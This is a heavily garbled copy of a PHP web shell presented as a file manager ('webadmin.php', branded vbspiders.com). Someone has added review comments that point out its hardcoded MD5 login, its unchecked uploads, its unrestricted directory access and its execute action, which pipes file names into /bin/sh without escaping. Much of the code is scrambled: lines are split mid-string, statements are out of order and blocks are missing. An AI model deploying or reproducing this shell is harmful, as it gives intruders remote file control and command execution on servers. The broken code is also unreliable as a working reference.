php
// Access gate for the whole script: the value 1 switches on the HTTP Basic
// check below; with any other value the block is skipped entirely.
$auth = 1;
//user & password = vbspiders.com
// Both constants are 32-hex-digit strings that are compared against md5() of
// the submitted user name and password, i.e. unsalted MD5 digests stored in
// the file itself.
// NOTE(review): the comment above already states the plaintext, so the digest
// protects nothing from anyone who can read this file. The two hash strings
// and the realm text are fixed literals, which makes them usable as
// file-content indicators when hunting for copies of this script.
$name='f4a8730b5b702cb1788226c600f52b79';
$pass='f4a8730b5b702cb1788226c600f52b79';
if($auth == 1) {
// Deny unless a user name was sent and both digests match. Only PHP_AUTH_USER
// is tested with isset(); PHP_AUTH_PW is read without a presence check, and
// the digests are compared with !== rather than hash_equals().
// NOTE(review): in this copy the array key and the realm string are split
// across two lines, so each literal contains a line break as written.
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['P
HP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
// The 401 plus WWW-Authenticate header makes the client prompt for
// credentials; exit() stops the request before any code below runs.
header('WWW-Authenticate: Basic realm="vbspiders
.com"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Wrong Password;</b>");
}
}
// Undo magic-quotes escaping on all three request arrays when the runtime
// reports that it is enabled. 'strip' is a callback defined outside this
// excerpt.
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, so this call
// places the script in the PHP 5/7 era.
if (get_magic_quotes_gpc()) {
array_walk($_GET, 'strip');
array_walk($_POST, 'strip');
array_walk($_REQUEST, 'strip');
}
// A request carrying ?image=<name> is answered with whatever getimage()
// returns, labelled as a GIF, and nothing else is processed. getimage() is
// not visible here; its argument comes straight from the query string.
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
die(getimage($_GET['image']));
}
// Fallback for PHP builds that lack lstat(): plain stat() stands in, which
// means a symbolic link is reported with the attributes of its target.
if (function_exists('lstat') === false) {
    function lstat ($filename) {
        $info = stat($filename);
        return $info;
    }
}
// Platform path separator; the path helpers read it through `global $delim`.
$delim = DIRECTORY_SEPARATOR;

// Windows detection: PHP_OS prefix when php_uname() exists, otherwise
// inferred from the separator character.
if (function_exists('php_uname')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
} else {
    $win = ($delim == '\\');
}

// Directory holding this script: the first non-empty server variable wins,
// then getcwd(), then '.' as a last resort.
if (!empty($_SERVER['PATH_TRANSLATED'])) {
    $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} else {
    $scriptdir = function_exists('getcwd') ? getcwd() : '.';
}

// $homedir is expected to be set before this point (not visible in this
// excerpt); it is resolved against the script directory.
$homedir = relative2absolute($homedir, $scriptdir);

// Working directory: the request's `dir` value when present, taken verbatim.
// Nothing in this block confines it to $homedir.
if (array_key_exists('dir', $_REQUEST)) {
    $dir = $_REQUEST['dir'];
} else {
    $dir = $homedir;
}

// Column count of the listing table: fewer columns on Windows.
$cols = 7;
if ($win) {
    $cols = 4;
}

// Default modes for new directories and files follow the process umask when
// umask() is available, unless a value was already configured.
if (!isset($dirpermission)) {
    if (function_exists('umask')) {
        $dirpermission = (0777 & ~umask());
    } else {
        $dirpermission = 0755;
    }
}
if (!isset($filepermission)) {
    if (function_exists('umask')) {
        $filepermission = (0666 & ~umask());
    } else {
        $filepermission = 0644;
    }
}

// File name of this script, HTML-escaped once here because it is later
// concatenated into form actions and links.
$self = '';
if (!empty($_SERVER['SCRIPT_NAME'])) {
    $self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
    $self = html(basename($_SERVER['PHP_SELF']));
}

// Treated as Apache when the server banner starts with "apache"
// (case-insensitive) or when no banner is available at all.
$apache = empty($_SERVER['SERVER_SOFTWARE'])
    || strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache';
switch ($action) {
case 'view':
if (is_script($file)) {
/* highlight_file is a mess! */
ob_start();
highlight_file($file);
$src = ereg_replace('<font color="([^"]*)">', '<span style="colo
r: \1">', ob_get_contents());
$src = str_replace(array('</font>', "\r", "\n"), array('</span>'
, '', ''), $src);
ob_end_clean();
ile) . '</h2>
html_header();
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($f
<hr />
<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3
pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
';');
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: ' . getmimetype($file));
header('Content-Disposition: attachment; filename=' . basename($file) .
header('Content-Length: ' . filesize($file));
readfile($file);
break;
case 'upload':
// Destination = the client-supplied file name resolved against the current
// directory. $file is presumably the uploaded-file entry (it is indexed with
// 'name' and 'tmp_name'); it is populated outside this excerpt.
// NOTE(review): no extension, content-type or size check is visible in this
// case, so the name chosen by the client decides what is written and where
// relative2absolute() places it.
$dest = relative2absolute($file['name'], $directory);
// An existing path is reported as an error rather than overwritten.
if (@file_exists($dest)) {
listing_page(error('already_exists', $dest));
} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
// Apply the default file mode; a chmod failure is silenced by '@'.
@chmod($dest, $filepermission);
listing_page(notice('uploaded', $file['name']));
} else {
listing_page(error('not_uploaded', $file['name']));
}
break;
case 'create_directory':
// Create the directory named by $file unless something already exists there.
// $file is set outside this excerpt.
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
// Set the umask to the complement of the wanted mode for the duration of
// mkdir(), then restore the previous value.
$old = @umask(0777 & ~$dirpermission);
if (@mkdir($file, $dirpermission)) {
listing_page(notice('created', $file));
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'create_file':
// Create an empty file at $file unless the path already exists, then hand it
// to edit(), which is defined outside this excerpt.
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
// NOTE(review): the mask is derived from 0777 although $filepermission
// defaults to a 0666-based mode; touch() takes no mode argument, so the
// resulting permissions come from this umask alone.
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
edit($file);
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'execute':
// Changes into the file's directory, pipes "./<basename>" into /bin/sh and
// collects the output lines and the exit status.
// The command line is built by string concatenation: basename($file) is
// placed between double quotes with no escapeshellarg(), so shell
// metacharacters in a file name are interpreted by the shell.
// This exec() call is the script's command-execution path; the literal
// `| /bin/sh` string is a stable marker when reviewing or scanning for it.
chdir(dirname($file));
$output = array();
$retval = 0;
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
// Any non-zero exit status is treated as an error.
$error = ($retval == 0) ? false : true;
// NOTE(review): the two lines that follow are remnants of statements that
// were lost from this copy of the file.
');
));
break;
case 'delete':
if (!empty($_POST['no'])) {
listing_page();
} elseif (!empty($_POST['yes'])) {
$failure = array();
$success = array();
foreach ($files as $file) {
if (del($file)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_deleted', implode("\n", $failure))
}
if (sizeof($success) > 0) {
$message .= notice('deleted', implode("\n", $success));
}
listing_page($message);
} else {
html_header();
';
<p>
" />
}
} else {
$name = basename($file);
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<input type="hidden" name="action" value="rename" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<b>' . word('rename_file') . '</b>
<p>' . html($file) . '</p>
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
<input type="text" name="destination" size="' . textfieldsize($name) . '
" value="' . html($name) . '" />
<hr />
<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'move':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = $dest . $filename;
if (!@file_exists($d) && @rename($file, $d)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_moved', implode("\n", $failure), $
dest);
}
if (sizeof($success) > 0) {
$message .= notice('moved', implode("\n", $success), $de
st);
}
listing_page($message);
} else {
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
';
<p>
if (@is_dir($dest)) {
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = addslash($dest) . $filename;
if (!@is_dir($file) && !@file_exists($d) && @cop
y($file, $d)) {
} else {
}
$success[] = $file;
$failure[] = $file;
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_copied', implode("\n", $fa
ilure), $dest);
}
if (sizeof($success) > 0) {
$message .= notice('copied', implode("\n", $succ
ess), $dest);
}
listing_page($message);
} else {
if (!@file_exists($dest) && @copy($file, $dest)) {
listing_page(notice('copied', $file, $dest));
} else {
listing_page(error('not_copied', $file, $dest));
}
}
} else {
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
';
<p>
<tr>
if (@chmod($file, $mode)) {
listing_page(notice('permission_set', $file, decoct($mod
e)));
} else {
mode)));
} else {
html_header();
$mode = fileperms($file);
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
<hr />
/td>
<table id="permission">
<tr>
<td></td>
<td style="border-right: 1px solid black">' . word('owner') . '<
<td style="border-right: 1px solid black">' . word('group') . '<
/td>
</tr>
<tr>
00)
40)
04)
00)
20)
02)
00)
10)
01)
004
000
000
002
000
000
001
000
000
</table>
<hr />
<input type="submit" name="set" value="' . word('set') . '" />
<input type="hidden" name="action" value="permission" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
break;
default:
listing_page();
}
/* ------------------------------------------------------------------------- */
function getlist ($directory) {
global $delim, $win;
if ($d = @opendir($directory)) {
while (($filename = @readdir($d)) !== false) {
$path = $directory . $filename;
if ($stat = @lstat($path)) {
$file = array(
'filename'
'path'
'is_file'
'is_dir'
'is_link'
'is_readable'
'is_writable'
'size'
'permission'
'owner'
'group'
'mtime'
'atime'
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
$filename,
$path,
@is_file($path),
@is_dir($path),
@is_link($path),
@is_readable($path),
@is_writable($path),
$stat['size'],
$stat['mode'],
$stat['uid'],
$stat['gid'],
@filemtime($path),
@fileatime($path),
);
'ctime'
=> @filectime($path)
if ($file['is_dir']) {
$file['is_executable'] = @file_exists($p
} else {
cutable($path);
if (!$win) {
$file['is_executable'] = @is_exe
} else {
$file['is_executable'] = true;
k($path);
if (function_exists('posix_getpwuid')) $file['ow
ner_name'] = @reset(posix_getpwuid($file['owner']));
if (function_exists('posix_getgrgid')) $file['gr
oup_name'] = @reset(posix_getgrgid($file['group']));
$files[] = $file;
}
}
return $files;
} else {
}
return false;
}
/**
 * Sort a list of rows in place by one column.
 *
 * @param array  $list    rows, each indexable by $key; modified by reference
 * @param string $key     column to order by
 * @param mixed  $reverse truthy to flip the sorted list afterwards
 */
function sortlist (&$list, $key, $reverse) {
    $lastIndex = sizeof($list) - 1;
    quicksort($list, 0, $lastIndex, $key);
    if (!$reverse) {
        return;
    }
    $list = array_reverse($list);
}
/**
 * Recursive in-place quicksort of $array[$first..$last] on column $key.
 *
 * The pivot is the value at the middle index; rows are compared with the
 * plain < and > operators, so ordering follows PHP's loose comparison rules.
 *
 * @param array  $array rows indexed by consecutive integers; modified by reference
 * @param int    $first lowest index of the slice
 * @param int    $last  highest index of the slice
 * @param string $key   column whose values are compared
 */
function quicksort (&$array, $first, $last, $key) {
    // Slices of zero or one element are already sorted.
    if ($first >= $last) {
        return;
    }

    $pivot = $array[floor(($first + $last) / 2)][$key];
    $lo = $first;
    $hi = $last;

    // $lo <= $hi always holds on entry, so a do/while visits the same
    // iterations as a pre-tested loop would.
    do {
        while ($array[$lo][$key] < $pivot) {
            $lo++;
        }
        while ($array[$hi][$key] > $pivot) {
            $hi--;
        }
        if ($lo <= $hi) {
            $held = $array[$lo];
            $array[$lo] = $array[$hi];
            $array[$hi] = $held;
            $lo++;
            $hi--;
        }
    } while ($lo <= $hi);

    quicksort($array, $first, $hi, $key);
    quicksort($array, $lo, $last, $key);
}
function permission_octal2string ($mode) {
if (($mode & 0xC000) === 0xC000) {
$type = 's';
} elseif (($mode & 0xA000) === 0xA000)
$type = 'l';
} elseif (($mode & 0x8000) === 0x8000)
$type = '-';
} elseif (($mode & 0x6000) === 0x6000)
$type = 'b';
} elseif (($mode & 0x4000) === 0x4000)
$type = 'd';
} elseif (($mode & 0x2000) === 0x2000)
$type = 'c';
} elseif (($mode & 0x1000) === 0x1000)
$type = 'p';
} else {
$type = '?';
}
$owner = ($mode & 00400) ? 'r' :
$owner .= ($mode & 00200) ? 'w' :
if ($mode & 0x800) {
$owner .= ($mode & 00100)
} else {
$owner .= ($mode & 00100)
}
'-';
'-';
'-';
'-';
{
{
{
{
{
{
? 's' : 'S';
? 'x' : '-';
? 's' : 'S';
? 'x' : '-';
'image/jpeg',
'image/gif',
'image/png',
'text/html',
'text/plain',
'application/xml',
'application/pdf'
im . $f)) {
$error = true;
}
closedir($dir);
if (!$error) return @rmdir($file);
return !$error;
} else {
}
} else {
return false;
return @unlink($file);
}
}
/**
 * Return $directory with exactly one trailing path separator appended when
 * it does not already end in one. The separator is the global $delim.
 */
function addslash ($directory) {
    global $delim;
    $lastChar = substr($directory, -1, 1);
    return ($lastChar != $delim) ? $directory . $delim : $directory;
}
/**
 * Resolve $string to a simplified path: relative input is appended to
 * $directory first, absolute input is used as given.
 *
 * NOTE(review): nothing here restricts the result to a base directory; an
 * absolute $string bypasses $directory entirely, and how '..' segments are
 * treated depends on simplify_path(), which is only partly visible in this
 * copy.
 */
function relative2absolute ($string, $directory) {
    $candidate = path_is_relative($string)
        ? addslash($directory) . $string
        : $string;
    return simplify_path($candidate);
}
/**
 * Tell whether $path is relative for the current platform (global $win).
 *
 * On Windows a path counts as absolute when its second character is ':'
 * (drive letter form); elsewhere when it starts with '/'.
 */
function path_is_relative ($path) {
    global $win;
    if (!$win) {
        return (substr($path, 0, 1) != '/');
    }
    return (substr($path, 1, 1) != ':');
}
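/**
 * Express $target relative to $directory.
 *
 * Walks $directory upwards one component at a time, emitting '..' plus the
 * separator for each step, until $directory is a prefix of $target; the rest
 * of $target is then appended. Returns '.' when both paths are equal.
 *
 * @param string $directory starting directory, expected to end in $delim
 * @param string $target    path to reach
 * @return string relative path using the global $delim as separator
 */
function absolute2relative ($directory, $target) {
    global $delim;
    $path = '';
    while ($directory != $target) {
        if ($directory == substr($target, 0, strlen($directory))) {
            // $directory is an ancestor of $target: append the remainder.
            $path .= substr($target, strlen($directory));
            break;
        }
        $path .= '..' . $delim;
        // Cut the last component: keep everything up to and including the
        // separator that precedes it.
        $parent = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
        if ($parent === $directory) {
            // No further component can be removed (e.g. paths with no common
            // root); stop instead of looping forever.
            break;
        }
        $directory = $parent;
    }
    if ($path == '') $path = '.';
    return $path;
}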
function simplify_path ($path) {
global $delim;
if (@file_exists($path) && function_exists('realpath') && @realpath($pat
h) != '') {
$path = realpath($path);
if (@is_dir($path)) {
return addslash($path);
} else {
return $path;
}
e $r = '';
</tr>
';
ry);
if (@is_dir($real_file)) {
echo '[ <a href="' . $self . '?dir=' . u
rlencode($real_file) . '">' . html($file['target']) . '</a> ]';
} else {
echo '<a href="' . $self . '?action=view
&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
}
} else {
echo html($file['target']);
}
} elseif ($file['is_dir']) {
echo '<img src="' . $self . '?image=folder" alt="folder"
/> [ ';
if ($win || $file['is_executable']) {
echo '<a href="' . $self . '?dir=' . urlencode($
file['path']) . '">' . html($file['filename']) . '</a>';
} else {
echo html($file['filename']);
}
echo ' ]';
} else {
if (substr($file['filename'], 0, 1) == '.') {
echo '<img src="' . $self . '?image=hidden_file"
} else {
';
$human = '';
';
echo html(permission_octal2string($file['permission']));
if ($l) echo '</a>';
echo "</td>\n";
if (array_key_exists('owner_name', $file)) {
echo "\t<td class=\"owner\" title=\"uid: {$file[
'owner']}\">{$file['owner_name']}</td>\n";
} else {
echo "\t<td class=\"owner\">{$file['owner']}</td
>\n";
}
if (array_key_exists('group_name', $file)) {
echo "\t<td class=\"group\" title=\"gid: {$file[
'group']}\">{$file['group_name']}</td>\n";
} else {
echo "\t<td class=\"group\">{$file['group']}</td
>\n";
}
}
echo ' <td class="functions">
<input type="hidden" name="file' . $i . '" value="' . html($file
['path']) . '" />
';
$actions = array();
if (function_exists('symlink')) {
$actions[] = 'create_symlink';
}
if (@is_writable(dirname($file['path']))) {
$actions[] = 'delete';
$actions[] = 'rename';
$actions[] = 'move';
}
if ($file['is_file'] && $file['is_readable']) {
$actions[] = 'copy';
$actions[] = 'download';
if ($file['is_writable']) $actions[] = 'edit';
}
if (!$win && function_exists('exec') && $file['is_file'] && $fil
e['is_executable'] && file_exists('/bin/sh')) {
$actions[] = 'execute';
}
if (sizeof($actions) > 0) {
. '" size="1">
';
echo '
tion) . "</option>\n";
echo '
</select>
<input class="small" type="submit" name="submit' . $i . '" value
=" > " onfocus="activate(\'other\')" />
';
}
echo ' </td>
</tr>
';
}
n>\n";
</select>
<input class="small" type="submit" name="submit_all" value=" >
; " onfocus="activate(\'other\')" />
</td>
</tr>
';
}
/**
 * Print the table row holding the "change directory" controls: a link back
 * to $homedir, a text field pre-filled with the current directory, and the
 * submit button.
 *
 * The directory value is passed through html() for the attribute and through
 * urlencode() for the link; $self is used as stored in the global.
 */
function directory_choice () {
    global $directory, $homedir, $cols, $self;

    $homeLink = $self . '?dir=' . urlencode($homedir);
    $label = word('directory');
    $fieldSize = textfieldsize($directory);
    $fieldValue = html($directory);
    $buttonText = word('change');

    echo '<tr>' . "\n"
        . '<td colspan="' . $cols . '" id="directory">' . "\n"
        . '<a href="' . $homeLink . '">' . $label . '</a>:' . "\n"
        . '<input type="text" name="dir" size="' . $fieldSize . '" value="' . $fieldValue
        . '" onfocus="activate(\'directory\')" />' . "\n"
        . '<input type="submit" name="changedir" value="' . $buttonText
        . '" onfocus="activate(\'directory\')" />' . "\n"
        . '</td>' . "\n"
        . '</tr>' . "\n";
}
function upload_box () {
global $cols;
>
echo '<tr>
<td colspan="' . $cols . '" id="upload">
' . word('file') . ':
<input type="file" name="upload" onfocus="activate(\'other\')" /
)">
\')" />
echo '<tr>
<td colspan="' . $cols . '" id="create">
<select name="create_type" size="1" onfocus="activate(\'create\'
<option value="file">' . word('file') . '</option>
<option value="directory">' . word('directory') . '</option>
</select>
<input type="text" name="create_name" onfocus="activate(\'create
} else {
wd;
$f = fopen($file, 'r');
while (!feof($f)) {
echo html(fread($f, 8192));
}
fclose($f);
if (!empty($_POST['user'])) {
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
}
if (!empty($_POST['basic_auth'])) {
if ($win) {
$authfile = str_replace('\\', '/', $directory) . $htpass
} else {
;\n";
}
echo '</textarea>
';
<hr />
if ($apache && basename($file) == $htpasswd) {
echo '
' . word('user') . ': <input type="text" name="user" />
' . word('password') . ': <input type="password" name="password" />
<input type="submit" value="' . word('add') . '" />
';
<hr />
}
<hr />
}
echo '
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
<input type="submit" name="save" value="' . word('save') . '" id="green_
button" style="margin-left: 50px" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
function spacer () {
global $cols;
</tr>
';
echo '<tr>
<td colspan="' . $cols . '" style="height: 1em"></td>
}
/**
 * Width for a text input showing $content: its byte length plus five,
 * never less than 30.
 */
function textfieldsize ($content) {
    return max(30, strlen($content) + 5);
}
// Re-emit every request parameter as a hidden form field so that the form
// being printed carries the original request along when it is submitted.
// Both the parameter name and its value pass through html() before output.
// NOTE(review): html() is called on each value as is; a parameter submitted
// as an array (name[]=...) would reach htmlentities() as an array — confirm
// how callers expect that to behave.
// NOTE(review): the `value=` literal is split across two lines in this copy,
// so the line break is part of the string that gets echoed.
function request_dump () {
foreach ($_REQUEST as $key => $value) {
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value=
"' . html($value) . "\" />\n";
}
}
/* ------------------------------------------------------------------------- */
/**
 * HTML-escape $string using the page character set ($site_charset).
 *
 * ENT_COMPAT converts double quotes but leaves single quotes untouched, so
 * the result is suitable for element text and double-quoted attributes only.
 */
function html ($string) {
    global $site_charset;
    $escaped = htmlentities($string, ENT_COMPAT, $site_charset);
    return $escaped;
}
/**
 * Look up the interface string for $word in the global $words table and
 * return it HTML-escaped with the table's character set ($word_charset).
 */
function word ($word) {
    global $words, $word_charset;
    $text = $words[$word];
    return htmlentities($text, ENT_COMPAT, $word_charset);
}
function phrase ($phrase, $arguments) {
global $words;
static $search;
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
for ($i = 0; $i < sizeof($arguments); $i++) {
}
/b>');
$arguments[$i] = nl2br(html($arguments[$i]));
$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '<
return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Nome File',
'size' => 'Dimensioni',
'permission' => 'Permessi',
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'functions' => 'Funzioni',
'read' => 'leggi',
'write' => 'scrivi',
'execute' => 'esegui',
'create_symlink' => 'crea link simbolico',
'delete' => 'cancella',
'rename' => 'rinomina',
'move' => 'sposta',
'copy' => 'copia',
'edit' => 'modifica',
'download' => 'download',
'upload' => 'upload',
'create' => 'crea',
'change' => 'cambia',
'save' => 'salva',
'set' => 'imposta',
'reset' => 'reimposta',
'relative' => 'Percorso relativo per la destinazione',
'yes' => 'Si',
'no' => 'No',
'back' => 'indietro',
'destination' => 'Destinazione',
'symlink' => 'Link simbolico',
'no_output' => 'no output',
'user' => 'User',
'password' => 'Password',
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',
'uploaded' => '"[%1]" stato caricato.',
'not_uploaded' => '"[%1]" non stato caricato.',
'already_exists' => '"[%1]" esiste gi.',
'created' => '"[%1]" stato creato.',
'not_created' => '"[%1]" non stato creato.',
'really_delete' => 'Cancello questi file ?',
'deleted' => "Questi file sono stati cancellati:\n[%1]",
'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
'rename_file' => 'File rinominato:',
'renamed' => '"[%1]" stato rinominato in "[%2]".',
'not_renamed' => '"[%1] non stato rinominato in "[%2]".',
'move_files' => 'Sposto questi file:',
'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'copy_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
<title>webadmin.php</title>
<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing:
1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing .permission_header { text-align: left }
.listing .permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-a
lign: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align
: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin
-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>
<script type="text/javascript">
<!-function activate (name) {
if (document && document.forms[0] && document.forms[0].elements['focus']
) {
document.forms[0].elements['focus'].value = name;
}
}
//-->
</script>
</head>
<body>
END;
}
/**
 * Print the closing tags of the page. No trailing newline is emitted after
 * the final tag.
 */
function html_footer () {
    echo "</body>\n</html>";
}
function notice ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
</tr>
';
}
function error ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
</tr>
';
}
?>